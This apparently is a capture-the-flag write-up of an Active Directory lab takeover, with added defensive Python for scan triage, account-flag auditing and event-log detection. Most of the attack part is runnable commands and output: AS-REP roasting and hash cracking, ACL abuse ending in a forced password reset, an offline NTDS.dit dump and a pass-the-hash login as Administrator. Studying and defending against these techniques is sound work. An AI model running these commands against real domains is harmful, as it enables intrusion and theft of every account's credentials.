NoCVE Range C

Preface

https://mp.weixin.qq.com/s/XFIlP-0FdP60GEAx7SS6xA

Environment

Kali: 192.168.120.2
Target: 192.168.120.128

Initial credentials

alice:P@sswrd

Enumeration

SMB domain enumeration

crackmapexec smb 192.168.120.0/24


Domain found: xya.com

Host found: WIN-CU3ACHOT7GL.xya.com (192.168.120.128)

Nmap scan

nmap -Pn -p- -sC -sV -oA nmap/full_scan_goad 192.168.120.128

Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-08 07:34 EST
Nmap scan report for xya.com (192.168.120.128)
Host is up (0.00025s latency).
Not shown: 65510 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-08 13:35:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: xya.com, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: xya.com, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49715/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:EB:5D:AF (VMware)
Service Info: Host: WIN-CU3ACHOT7GL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_nbstat: NetBIOS name: WIN-CU3ACHOT7GL, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:eb:5d:af (VMware)
| smb2-time:
| date: 2026-02-08T13:36:12
|_ start_date: N/A
|_clock-skew: 59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.04 seconds

192.168.120.128 is the domain controller

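As an added example, not code from the original post: the conclusion that the host is a domain controller can be read mechanically off the nmap output, and the same output carries two facts a defender should note, that SMB signing is required (good) and that the clocks differ by almost an hour (Kerberos rejects requests whose timestamp is more than 5 minutes off by default). The Python below parses nmap's normal output format; the embedded excerpt is taken from the scan on this page, while the port-to-role table and the triage fields are my own.

```python
import re

# Excerpt of the nmap output shown on this page (normal output format).
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-08 13:35:18Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: xya.com, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: xya.com, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 59m59s
"""

# Ports that normally only a domain controller exposes together.
DC_ROLE_PORTS = {
    88: "Kerberos KDC",
    389: "LDAP",
    464: "Kerberos password change",
    636: "LDAPS",
    3268: "Global Catalog",
    3269: "Global Catalog over TLS",
    9389: "AD Web Services",
}
KERBEROS_MAX_SKEW_SECONDS = 300  # default Kerberos clock tolerance (5 minutes)

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")


def parse_open_ports(text):
    """Map open TCP port -> (service, version string)."""
    ports = {}
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports[int(m.group(1))] = (m.group(2), m.group(3).strip())
    return ports


def parse_domain(text):
    """First 'Domain: x' token nmap prints for AD LDAP."""
    m = re.search(r"Domain:\s*([\w.-]+)", text)
    return m.group(1) if m else None


def parse_clock_skew_seconds(text):
    """Turn the short form 'clock-skew: 59m59s' (or '-1h2m3s') into signed seconds."""
    m = re.search(r"clock-skew:\s*(-?)((?:\d+[hms])+)", text)
    if not m:
        return None
    sign = -1 if m.group(1) else 1
    unit = {"h": 3600, "m": 60, "s": 1}
    return sign * sum(int(v) * unit[u] for v, u in re.findall(r"(\d+)([hms])", m.group(2)))


def smb_signing_required(text):
    return "Message signing enabled and required" in text


def triage(text):
    ports = parse_open_ports(text)
    skew = parse_clock_skew_seconds(text)
    return {
        "domain": parse_domain(text),
        # Kerberos plus LDAP on the same host is the DC signature.
        "is_dc": 88 in ports and 389 in ports,
        "dc_services": {p: DC_ROLE_PORTS[p] for p in ports if p in DC_ROLE_PORTS},
        "smb_signing_required": smb_signing_required(text),
        "clock_skew_seconds": skew,
        "kerberos_skew_exceeded": skew is not None and abs(skew) > KERBEROS_MAX_SKEW_SECONDS,
        "winrm_exposed": 5985 in ports or 5986 in ports,
    }


if __name__ == "__main__":
    for key, value in triage(NMAP_OUTPUT).items():
        print(f"{key}: {value}")
```

The skew field is the one most often overlooked: with the two hosts nearly an hour apart, Kerberos authentication and ticket requests fail in both directions until the clocks are brought back within tolerance, which is also why Kerberos-based steps in a lab sometimes fail for reasons unrelated to permissions.
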
Edit the hosts file

192.168.120.128 xya.com

Enumerate users

crackmapexec smb 192.168.120.128 -u 'alice' -p 'P@sswrd' --users
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL xya.com\xya_admin badpwdcount: 0 desc:
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL xya.com\vllay badpwdcount: 0 desc:
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL xya.com\jake badpwdcount: 0 desc:
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL xya.com\tolly badpwdcount: 0 desc:
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL xya.com\calue badpwdcount: 0 desc:
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL xya.com\wake badpwdcount: 0 desc:
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL xya.com\alice badpwdcount: 0 desc:
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL xya.com\krbtgt badpwdcount: 0 desc: Key Distribution Center Service Account
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL xya.com\Guest badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL xya.com\Administrator badpwdcount: 0 desc: Built-in account for administering the computer/domain

Enumerate shares

crackmapexec smb 192.168.120.128 -u 'alice' -p 'P@sswrd' --shares
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL Share Permissions Remark
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL ----- ----------- ------
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL ADMIN$ Remote Admin
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL C$ Default share
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL IPC$ READ Remote IPC
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL NETLOGON READ Logon server share
SMB 192.168.120.128 445 WIN-CU3ACHOT7GL SYSVOL READ Logon server share

Connecting with smbclient turned up nothing: ADMIN$ and C$ are not accessible, and IPC$, NETLOGON and SYSVOL contain no important files.

Password spraying

Enumerate the password policy

crackmapexec smb 192.168.120.128 -u 'alice' -p 'P@sswrd' --pass-pol


The password policy shows the account lockout threshold as "None". This means there is no account lockout policy, so wrong-password attempts will not lock accounts.

Spraying

crackmapexec smb 192.168.120.128 -u users.txt -p 'P@sswrd' --no-bruteforce


All failed

Kerberoasting

impacket-GetUserSPNs -request -dc-ip 192.168.120.128 xya.com/alice:P@sswrd -outputfile kerberoasting.hashes

Failed

crackmapexec ldap 192.168.120.128 -u alice -p 'P@sswrd' -d xya.com --kerberoasting KERBEROASTING

Failed

AS-REP Roasting

The users enumerated with CME are as follows:

xya_admin
vllay
jake
tolly
calue
wake
alice
krbtgt
Guest
Administrator

Try AS-REP Roasting against all users with GetNPUsers.py from the Impacket toolkit:

impacket-GetNPUsers xya.com/ -no-pass -usersfile users.txt

Obtained vllay's hash

$krb5asrep$23$vllay@XYA.COM:02312a12e9b5fe4b1d2710d41b885b10$a67aa273d4f7728551d80e57857a4f7787d22dd62e75da759416f51bd7cfe9241bd3f72fa6a970f4e2f4794896d6fa2eaed1aefe2a77707ad493bbd1f3fe6
7f9965501f5260a0d15d9f85ffa46f19c091cb5e3748ded5ce0814e023bf4d495e83f33e5e8f26da5d1c8ab0d7bab838e43fecec9d2f44218702c842f04be68a73f1916774d7ef6631ec8097ee65308eb1db61e27f753c0df0a4ee9aca
9c985f5b0b7fd2ad944639b3d1cd94229788aca060b229dfc9d5213437f149cbde7790a7071344f3e0689431496ae6a4460a077d5b18828cabd98acfc211368c5b02a489ae264

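As an added example, not code from the original post: the artefact above exists only because vllay's account has Kerberos pre-authentication disabled (the DONT_REQ_PREAUTH bit, 0x400000, in userAccountControl), and its $krb5asrep$23$ prefix records that the KDC answered with RC4-HMAC (etype 23). The Python below does the defender's side of this: it reads userAccountControl values in the LDIF form that ldapsearch prints, decodes the bits, lists enabled accounts carrying risky flags, and pulls the etype and principal out of an AS-REP line. The LDIF entries are constructed samples; the page does not show the lab's real attribute values.

```python
import re

# Constructed LDIF sample in the shape ldapsearch prints. The userAccountControl
# values are made up for illustration and are not taken from the lab.
SAMPLE_LDIF = """\
dn: CN=vllay,CN=Users,DC=xya,DC=com
sAMAccountName: vllay
userAccountControl: 4260352

dn: CN=alice,CN=Users,DC=xya,DC=com
sAMAccountName: alice
userAccountControl: 66048

dn: CN=Guest,CN=Users,DC=xya,DC=com
sAMAccountName: Guest
userAccountControl: 66082
"""

# userAccountControl bit names as documented by Microsoft.
UAC_FLAGS = {
    0x0001: "SCRIPT",
    0x0002: "ACCOUNTDISABLE",
    0x0008: "HOMEDIR_REQUIRED",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0100: "TEMP_DUPLICATE_ACCOUNT",
    0x0200: "NORMAL_ACCOUNT",
    0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x20000: "MNS_LOGON_ACCOUNT",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x4000000: "PARTIAL_SECRETS_ACCOUNT",
}
# Flags that weaken authentication for an enabled account.
RISKY_FLAGS = {"DONT_REQ_PREAUTH", "PASSWD_NOTREQD", "USE_DES_KEY_ONLY",
               "TRUSTED_FOR_DELEGATION", "ENCRYPTED_TEXT_PWD_ALLOWED"}


def decode_uac(value):
    """Return the flag names set in a userAccountControl integer, low bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def parse_ldif(text):
    """Split LDIF into one dict per entry (a blank line separates entries)."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        key, _, val = line.partition(":")
        current[key.strip()] = val.strip()
    if current:
        entries.append(current)
    return entries


def find_risky_accounts(entries):
    """Map sAMAccountName -> risky flags, for accounts that are not disabled."""
    risky = {}
    for e in entries:
        flags = decode_uac(int(e.get("userAccountControl", "0")))
        if "ACCOUNTDISABLE" in flags:
            continue  # a disabled account cannot request a TGT at all
        hits = sorted(f for f in flags if f in RISKY_FLAGS)
        if hits:
            risky[e["sAMAccountName"]] = hits
    return risky


ASREP_RE = re.compile(r"^\$krb5asrep\$(\d+)\$([^@]+)@([^:]+):")


def parse_asrep_header(hash_line):
    """Extract (etype, principal, realm) from a $krb5asrep$ line like the one above."""
    m = ASREP_RE.match(hash_line)
    if not m:
        return None
    return int(m.group(1)), m.group(2), m.group(3)


if __name__ == "__main__":
    print(find_risky_accounts(parse_ldif(SAMPLE_LDIF)))
    print(parse_asrep_header("$krb5asrep$23$vllay@XYA.COM:02312a12e9b5fe4b1d2710d41b885b10$a67a"))
```

On the detection side, a TGT request without pre-authentication shows up on the domain controller as event 4768 with Pre-Authentication Type 0, which is the usual alert for this technique; the remediation is simply to re-enable pre-authentication on the account.
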

Cracking

hashcat -m 18200 vllay.hash /usr/share/wordlists/rockyou.txt


Credentials obtained

vllay:P@ssw0rd

WinRM

Log in to WinRM with each of the two known credential sets

alice: failed

vllay: succeeded

evil-winrm -i 192.168.120.128 -u vllay -p 'P@ssw0rd'

The first flag is on the Desktop

flag{3142D7288BA5D443}

BloodHound

Collection

bloodhound-python --zip -c All -d xya.com -u alice -p P@sswrd -dc WIN-CU3ACHOT7GL.xya.com -ns 192.168.120.128

Searching from the obtained credentials alice and vllay:

alice and vllay have AddMember rights on the IT_SUPPORT group
The IT_SUPPORT group has WriteOwner over the user wake
The user wake has remote PowerShell rights on WIN-CU3ACHOT7GL
WIN-CU3ACHOT7GL can DCSync


ACL abuse

AddMember

Add vllay to the IT_Support group

Find the DNs

ldapsearch -H ldap://192.168.120.128 -x -D "vllay@xya.com" -w 'P@ssw0rd' -b "DC=xya,DC=com" "(sAMAccountName=vllay)" distinguishedName
CN=vllay,CN=Users,DC=xya,DC=com

ldapsearch -H ldap://192.168.120.128 -x -D "vllay@xya.com" -w 'P@ssw0rd' -b "DC=xya,DC=com" "(sAMAccountName=IT_Support)" distinguishedName
CN=IT_Support,CN=Users,DC=xya,DC=com

Join the group

ldeep ldap -u vllay -p P@ssw0rd -d xya.com -s ldap://192.168.120.128 add_to_group "CN=vllay,CN=Users,DC=xya,DC=com" "CN=IT_Support,CN=Users,DC=xya,DC=com"


Verify

ldeep ldap -u vllay -p P@ssw0rd -d xya.com -s ldap://192.168.120.128 membersof 'IT_Support'


WriteOwner

Change the owner of wake to vllay

Read the current owner

impacket-owneredit -action read -target 'wake' xya.com/vllay:P@ssw0rd
[*] Current owner information below
[*] - SID: S-1-5-21-3108373346-1578681561-945658689-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=xya,DC=com

Change the owner

impacket-owneredit -action write -new-owner 'vllay' -target 'wake' xya.com/vllay:P@ssw0rd

Check

impacket-owneredit -action read -target 'wake' xya.com/vllay:P@ssw0rd
[*] Current owner information below
[*] - SID: S-1-5-21-3108373346-1578681561-945658689-1112
[*] - sAMAccountName: vllay
[*] - distinguishedName: CN=vllay,CN=Users,DC=xya,DC=com

Use the ownership to grant FullControl

impacket-dacledit -action write -rights FullControl -principal vllay -target 'wake' xya.com/vllay:P@ssw0rd
[*] DACL backed up to dacledit-20260208-092136.bak
[*] DACL modified successfully!

Change wake's password

rpcclient -U 'vllay%P@ssw0rd' 192.168.120.128
rpcclient $> setuserinfo2 wake 23 'P@ssw0rd'


We now have new credentials

wake:P@ssw0rd

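The AddMember, WriteOwner, DACL-write and password-reset steps above leave a distinctive trail in the domain controller's Security log: a group-membership event (4728, 4732 or 4756) whose added member is the acting account itself, then 5136 events on the target user's nTSecurityDescriptor, then a 4724 password reset on the same target, all within minutes and all by the same subject. As an added example that is not code from the original post, the Python below correlates those events per actor. The events are constructed to mirror the chain on this page (not real log data); the field names follow the Windows Security log EventData schema, and 5136 only fires when the "Audit Directory Service Changes" subcategory is enabled and the object carries a matching SACL.

```python
from datetime import datetime, timedelta

# Constructed sample events mirroring the chain in this section (not real log data).
# Field names follow the Windows Security log EventData schema.
EVENTS = [
    {"EventID": 4728, "TimeCreated": "2026-02-08T14:12:25", "SubjectUserName": "vllay",
     "TargetUserName": "IT_Support", "MemberName": "CN=vllay,CN=Users,DC=xya,DC=com"},
    {"EventID": 5136, "TimeCreated": "2026-02-08T14:20:40", "SubjectUserName": "vllay",
     "ObjectDN": "CN=wake,CN=Users,DC=xya,DC=com", "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 5136, "TimeCreated": "2026-02-08T14:21:36", "SubjectUserName": "vllay",
     "ObjectDN": "CN=wake,CN=Users,DC=xya,DC=com", "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4724, "TimeCreated": "2026-02-08T14:28:13", "SubjectUserName": "vllay",
     "TargetUserName": "wake"},
    # Benign noise: a helpdesk reset with no preceding ownership/DACL change.
    {"EventID": 4724, "TimeCreated": "2026-02-08T15:02:00", "SubjectUserName": "helpdesk1",
     "TargetUserName": "jake"},
    # Benign noise: an admin adds someone else (not themselves) to a group.
    {"EventID": 4728, "TimeCreated": "2026-02-08T15:10:00", "SubjectUserName": "xya_admin",
     "TargetUserName": "IT_Support", "MemberName": "CN=tolly,CN=Users,DC=xya,DC=com"},
]

GROUP_ADD_IDS = {4728, 4732, 4756}   # member added to a global / local / universal group
WINDOW = timedelta(hours=1)           # how close the steps must be to count as one chain


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def _cn(dn):
    """'CN=wake,CN=Users,DC=xya,DC=com' -> 'wake'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def detect_acl_takeover(events, window=WINDOW):
    """One finding per password reset that follows a security-descriptor rewrite of the
    same target by the same actor; severity rises if the actor first added itself to a group."""
    by_actor = {}
    for e in sorted(events, key=_ts):
        by_actor.setdefault(e["SubjectUserName"], []).append(e)

    findings = []
    for actor, evs in by_actor.items():
        self_adds = [e for e in evs if e["EventID"] in GROUP_ADD_IDS
                     and _cn(e["MemberName"]).lower() == actor.lower()]
        sd_writes = [e for e in evs if e["EventID"] == 5136
                     and e.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"]
        for reset in (e for e in evs if e["EventID"] == 4724):
            target = reset["TargetUserName"]
            t_reset = _ts(reset)
            related = [e for e in sd_writes if _cn(e["ObjectDN"]).lower() == target.lower()
                       and timedelta(0) <= t_reset - _ts(e) <= window]
            if not related:
                continue
            first_sd = min(_ts(e) for e in related)
            groups = [e["TargetUserName"] for e in self_adds
                      if timedelta(0) <= first_sd - _ts(e) <= window]
            findings.append({
                "actor": actor,
                "target": target,
                "self_added_to": groups,
                "sd_writes": len(related),
                "reset_at": reset["TimeCreated"],
                "severity": "high" if groups else "medium",
            })
    return findings


if __name__ == "__main__":
    for finding in detect_acl_takeover(EVENTS):
        print(finding)
```

The rule deliberately keys on the target's security descriptor rather than on any one tool: owneredit, dacledit and their PowerShell equivalents all produce the same 5136 on nTSecurityDescriptor. The root cause to fix is the ACL itself, which BloodHound already surfaced: a non-admin group holding WriteOwner over a user that can reach the domain controller.
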
DCSync

impacket-secretsdump xya.com/wake:P@ssw0rd@192.168.120.128

Failed: no permission

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

Look for another direction

Decrypting NTDS

Try logging in as wake

evil-winrm -i 192.168.120.128 -u wake -p 'P@ssw0rd'

After logging in, flag2 is found

flag{F6D4ED8F870B54E0}

ntds.dit and SYSTEM are also found in the current directory


NTDS.dit

The core database file of Windows Active Directory; it stores the domain's objects and attributes: users, computers, groups, password hashes and other directory metadata.
The file format is an ESE (Extensible Storage Engine) database, also known as Jet Blue.
Extremely sensitive: once copied and parsed offline, an attacker can obtain a large amount of account information and credentials, so it must be strictly protected.

SYSTEM

The Windows SYSTEM registry hive (usually the file C:\Windows\System32\Config\SYSTEM) holds system-wide configuration.
In credential dumping and forensic scenarios, the SYSTEM hive is used to obtain the machine's system key (BootKey) or to recover certain encryption/storage keys (for decrypting credentials stored on the host), so it is often analysed offline together with NTDS.dit.
It is equally sensitive and must be handled in a controlled manner.

Download

download ntds.dit
download SYSTEM

Decrypt

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
┌──(root㉿kali)-[/home/kali/xya/nocve/c]
└─# impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xf8ea2ad7081a6ac6ff4e07a80572afac
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: bd833257b7223e78413115655773a5fc
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ece39e1190e04b11c0c21797feb2ec1e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-CU3ACHOT7GL$:1000:aad3b435b51404eeaad3b435b51404ee:ab7a4f9463a184b0192b51e298af43c4:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d92500b687a988e392652e5fc3f48eaa:::
alice:1103:aad3b435b51404eeaad3b435b51404ee:c328ad272ba9ef4d57bbd4bed522fc69:::
wake:1104:aad3b435b51404eeaad3b435b51404ee:222aae4cc7963a3042b600c1f3f0f6bc:::
calue:1106:aad3b435b51404eeaad3b435b51404ee:222aae4cc7963a3042b600c1f3f0f6bc:::
tolly:1107:aad3b435b51404eeaad3b435b51404ee:222aae4cc7963a3042b600c1f3f0f6bc:::
jake:1108:aad3b435b51404eeaad3b435b51404ee:222aae4cc7963a3042b600c1f3f0f6bc:::
vllay:1112:aad3b435b51404eeaad3b435b51404ee:f6cb7ec14bc5ca580704006e025e4dd3:::
xya_admin:2101:aad3b435b51404eeaad3b435b51404ee:ece39e1190e04b11c0c21797feb2ec1e:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:c64e5ebc5f7b7ac425200b12eac0dfb70e36377052547242b185683eac422dcf
Administrator:aes128-cts-hmac-sha1-96:e126327fd843bfc06141b711523f003f
Administrator:des-cbc-md5:ead0b585e9fd3e5d
WIN-CU3ACHOT7GL$:aes256-cts-hmac-sha1-96:2a4adca7e157deed3fb6a7190f39350702e51b121db61348e1012d34090c97a4
WIN-CU3ACHOT7GL$:aes128-cts-hmac-sha1-96:4f15431a729544e72f04877cc3b2a44f
WIN-CU3ACHOT7GL$:des-cbc-md5:0210cbae0791bfa2
krbtgt:aes256-cts-hmac-sha1-96:8ff0e36703d9f78dc59cd3c088573b8a4165a580d979d6635e09280039bc5d8d
krbtgt:aes128-cts-hmac-sha1-96:3f2ad8009a57b7348c6f7ecce3257832
krbtgt:des-cbc-md5:ae9d46df9ee07329
alice:aes256-cts-hmac-sha1-96:6cf4da3b0fcfe546c53846347120a75a73ce5525e81f50f701fa832f2f7b81af
alice:aes128-cts-hmac-sha1-96:df55b0ff613061091bc830fd8b8f4840
alice:des-cbc-md5:5720d0adb5f132c1
wake:aes256-cts-hmac-sha1-96:522d98d6f6a652ecdd67199fd179472b2ea46d4d18caba5c79730f43311ce822
wake:aes128-cts-hmac-sha1-96:eb462f6bec63cdd2706f262cd08d3f02
wake:des-cbc-md5:e38ce651b05b644c
calue:aes256-cts-hmac-sha1-96:d5f5d517b6cd0d441bf57d552fda4820fa48e44536ab66319def8c8c0c380b09
calue:aes128-cts-hmac-sha1-96:3b4d13fb499e57cb7f4fd2da43f9d871
calue:des-cbc-md5:57e09829293792e9
tolly:aes256-cts-hmac-sha1-96:486674c0204b9fe8fc05db34e09c1e1a6044933a88bf339b3ea41b5827b30627
tolly:aes128-cts-hmac-sha1-96:f74894fc14c47cf9b53b800cece3db45
tolly:des-cbc-md5:d979b31c04296e3e
jake:aes256-cts-hmac-sha1-96:4c602224cfd25ef6c16c6dd841ec0abcd6b818ba1427355736cc5f73f347886a
jake:aes128-cts-hmac-sha1-96:f29553321fec926d84d9957abfb02e94
jake:des-cbc-md5:b938c4e35b4c973e
vllay:aes256-cts-hmac-sha1-96:da14c5fe39ed80368fb8642a6653bba13ab09a7f51e8e28a229a1720190cda1c
vllay:aes128-cts-hmac-sha1-96:6297112c7ab7baebb205ec33fdd1f5b5
vllay:des-cbc-md5:20b946cee00e3d9b
xya_admin:aes256-cts-hmac-sha1-96:1eacab403fff586a71215f63895668a504c4ab918c43920786540ca13995bb24
xya_admin:aes128-cts-hmac-sha1-96:5dd476d7000aaff99283b9a761594a43
xya_admin:des-cbc-md5:6bbac1324c137f26
[*] Cleaning up...

Hashes obtained

evil-winrm -i 192.168.120.128 -u Administrator -H 'ece39e1190e04b11c0c21797feb2ec1e'

Logged in as domain admin

The third flag is on the Desktop

flag{094E798635415378}

NoCVE Range C
http://xiaowu5.cn/2026/02/08/NoCVE-Range-C/
Author: 5
Published: February 8, 2026
License: BY XIAOWU